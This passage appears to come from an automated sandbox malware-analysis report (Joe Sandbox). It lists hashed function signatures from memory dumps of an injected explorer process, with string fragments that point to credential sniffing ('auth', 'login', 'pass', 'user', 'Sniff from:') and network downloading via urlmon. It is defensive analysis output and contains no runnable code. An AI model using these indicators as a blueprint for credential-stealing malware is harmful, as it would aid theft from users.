                                                                                • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                • Instruction Fuzzy Hash: 8B417230A1DE0D9FCF94EF58A1957AD77E1FB58340F81416AA80ED7240DA30D980CBC2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$el32$h$kern
                                                                                • API String ID: 0-4264704552
                                                                                • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                • Instruction ID: 515c6cf067d383980d0a1963159d363fbc5b9ee43c3fa05472054397a6017f73
                                                                                • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                • Instruction Fuzzy Hash: 83419070608B498FE7A9CF2880C53AAF7E1FBA8305F104A2E949EC7265DF74D945CB41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$el32$h$kern
                                                                                • API String ID: 0-4264704552
                                                                                • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                • Instruction ID: 6bf86c5ccaca8d4f1a8df915603a71f4536220816744e3d0f283c6a0771473b4
                                                                                • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                • Instruction Fuzzy Hash: 0341607060CB4D8FD799DF2890853AAB7E1FBA8340F504A6EA49EC3256DB70D985CF41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $Snif$f fr$om:
                                                                                • API String ID: 0-3434893486
                                                                                • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                • Instruction ID: f5f1d04ed575b19f91d16ae02150dc18f96fc7b51a1665e0c28b61bdf5f802e8
                                                                                • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                • Instruction Fuzzy Hash: 2B31F07050CB88AFD75ADB28D0C56DAB7D0FB84300F60491EE49BC7251EE34A54ACB43
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $Snif$f fr$om:
                                                                                • API String ID: 0-3434893486
                                                                                • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                • Instruction ID: c9fea1344aeaf8f3cb9e492863cf34e128aface7dc9b2856c3e4b515c69cac7a
                                                                                • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                • Instruction Fuzzy Hash: 4631057050CB889FC71ADB68E0856EAB7D4FB84300F90491EE49BC7291EF30A589CB43
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $Snif$f fr$om:
                                                                                • API String ID: 0-3434893486
                                                                                • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                • Instruction ID: 78cebcf3d221cbbb83d87702cda9295c5b4b439ab06592dfb6d01774a2d22813
                                                                                • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                • Instruction Fuzzy Hash: CD310171508B48AFE759DF28C4C56EAB3D0FBD4300F60491EE49BC7241EE34E90ACA42
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $Snif$f fr$om:
                                                                                • API String ID: 0-3434893486
                                                                                • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                • Instruction ID: 21d8b448da04ff1ebeb07bf0da3976471c3180532f8e7d4119e9fede59d69f7d
                                                                                • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                • Instruction Fuzzy Hash: D131F47150CB48AFD719DB68E4856EAB7D4FB94300F90491EE49BC3291EF30E586CA43
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$chro$hild$me_c
                                                                                • API String ID: 0-3136806129
                                                                                • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                • Instruction ID: b5116f496f4aa6d2346753c6bbcd3c993d9647838c62ea4790e25efe5ebf7e45
                                                                                • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                • Instruction Fuzzy Hash: 8531BE70218B184FC784EF2884C6BAAB7E1FBD8305F95562DA48ECB254DF34E905C782
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$chro$hild$me_c
                                                                                • API String ID: 0-3136806129
                                                                                • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                • Instruction ID: e1baa1443fc637c4d382ab996be95692dc65a2f3df402cdc4c520336fd35c38e
                                                                                • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                • Instruction Fuzzy Hash: 45315C7411CA484FCB84EF68A495BAAB7E1FF98300FD4462DA44ECB255DF30D985CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$chro$hild$me_c
                                                                                • API String ID: 0-3136806129
                                                                                • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                • Instruction ID: 4cc05b8eaeb6fa24d19e75f70140fa569c7af20dcaf44bdb6d81067f48dd2be9
                                                                                • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                • Instruction Fuzzy Hash: CF319C70218B184FC788DF6884D6BAAB7E1FBD8305F95562DA48ACB254CF34D905C782
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$chro$hild$me_c
                                                                                • API String ID: 0-3136806129
                                                                                • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                • Instruction ID: 086dd01dba2029e253f7a2f2c349da926f8de64d8e137c2888ee14c770dc5613
                                                                                • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                • Instruction Fuzzy Hash: D9316D7411CB484FC784DF68A495AAAB7E1FF98300FD4462DA44ECB255DF30D985CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                • API String ID: 0-319646191
                                                                                • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                • Instruction ID: 4843674d67bbd034823bc580834e94688384f27f34af7f1afa0e3045310f6577
                                                                                • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                • Instruction Fuzzy Hash: CE31F170A14A0C8BDB04EFA8D8857EDB7E0FF98209F40422EE55ED7240DE789A44C789
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                • API String ID: 0-319646191
                                                                                • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                • Instruction ID: 2f334c80ab7999685dbe65f629a2bac85de96ca48b2c068171c09cdca7e230a7
                                                                                • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                • Instruction Fuzzy Hash: 7D31E331618A0C8FCB44EFA8E8857EDBBE1FF58214F80022AE45ED7240DF749685C799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                • API String ID: 0-319646191
                                                                                • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                • Instruction ID: e800fd13489c7d3c9d6c21af973b54d036029a4f61c16f90f8c2f1c7ffb25643
                                                                                • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                • Instruction Fuzzy Hash: 7821E470A14A5C8BDB05EFA8D8857EDBBE0FF58209F40422EE55AD7240DF789A05C789
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                • API String ID: 0-319646191
                                                                                • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                • Instruction ID: 011ce6492544adbb58ec804777cf95d90cecedf8914aa126d3aaed74046bef85
                                                                                • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                • Instruction Fuzzy Hash: 1C21E670618A4C8BCB04DFA8E8457EDBBE1FF58204F81421AE45AD7250DF749685C795
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$l$l$t
                                                                                • API String ID: 0-168566397
                                                                                • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                • Instruction ID: 37ef3f8cb74316fa6c60edae81ac040b685d867e4601e3b684651a5c1233e2b7
                                                                                • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                • Instruction Fuzzy Hash: E8216074A14A0D9FEB44EFA8D0857ADBAF1FF58304F60462DE049D7610DB78A551CB84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$l$l$t
                                                                                • API String ID: 0-168566397
                                                                                • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                • Instruction ID: 53f20b0964d1453c31d87c64664f6721186fcd90561041ead771a98d2c0871a1
                                                                                • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                • Instruction Fuzzy Hash: 89216D74A24A0D9BEB48EFA8D4857EDBBF1FB58308F60462DE049D7600DB78A5518B84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$l$l$t
                                                                                • API String ID: 0-168566397
                                                                                • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                • Instruction ID: 1847c0fe337eb18099b002538cae21e8af9a290207e23efaaae24f6ae1bf7624
                                                                                • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                • Instruction Fuzzy Hash: D4218D78A28B0D9FDB44EFA8D0457AEBAF0FF18314F90462EE009D3600DB74A591CB84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$l$l$t
                                                                                • API String ID: 0-168566397
                                                                                • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                • Instruction ID: 7da763ffcd1eed85e78d0f4a3ebe9714b49489272ce4f2abd8ffa67d63290cde
                                                                                • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                • Instruction Fuzzy Hash: 58216D78A28A4D9BDB44EFA8D4457EDBBF1FF18314F90462DE049D3600DB74A591CB84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: auth$logi$pass$user
                                                                                • API String ID: 0-2393853802
                                                                                • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                • Instruction ID: 17151b60e7c10cafc8aae5ce97e5c6cca1e611fac9e3987bee8ddee9c4f22097
                                                                                • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                • Instruction Fuzzy Hash: 1821DC70614B0D8BDB05CF9D888129EB7F1FF88384F005619A44AEB345DBB4E9108BC2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: auth$logi$pass$user
                                                                                • API String ID: 0-2393853802
                                                                                • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                • Instruction ID: bb04d0a7279e7eea8ab07d3c74b77ffcffeac3e1c2a0391d000fb6ed30feaabb
                                                                                • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                • Instruction Fuzzy Hash: 0021C030618B0D8BCB45DF9DA8916EEB7E1FF88344F404619E40ADB244DBB0E954CBC2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%